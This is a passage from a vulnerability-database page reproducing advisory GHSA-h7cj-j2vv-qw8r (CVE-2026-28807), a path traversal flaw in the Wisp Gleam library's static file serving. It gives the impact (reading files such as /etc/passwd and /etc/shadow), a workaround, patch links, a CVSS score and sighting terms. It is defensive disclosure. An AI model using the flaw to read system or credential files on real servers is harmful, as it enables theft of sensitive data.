keys\n- System files (`/etc/passwd`, `/etc/shadow` if permissions allow)\n\n### Workaround\n\nCopy the [fixed implementation](https://github.com/gleam-wisp/wisp/blob/161118c431047f7ef1ff7cabfcc38981877fdd93/src/wisp.gleam#L1413-L1461) to your codebase and replace references to wisp.serve_static with this version in your codebase.\n\n### References\n\n* Commit that introduced the vulnerability: https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550\n* Patch Commit: https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93",
  "id": "GHSA-h7cj-j2vv-qw8r",
  "modified": "2026-03-11T05:45:56Z",
  "published": "2026-03-11T00:11:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/commit/129dcb1fe10ab1e676145d91477535e1c90ab550"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gleam-wisp/wisp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Wisp Vulnerable to Path Traversal"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-28807 (GCVE-0-2026-28807)

FKIE_CVE-2026-28807

GHSA-H7CJ-J2VV-QW8R

Summary

Details

PoC

Impact

Workaround

References

Tags

Sightings

Nomenclature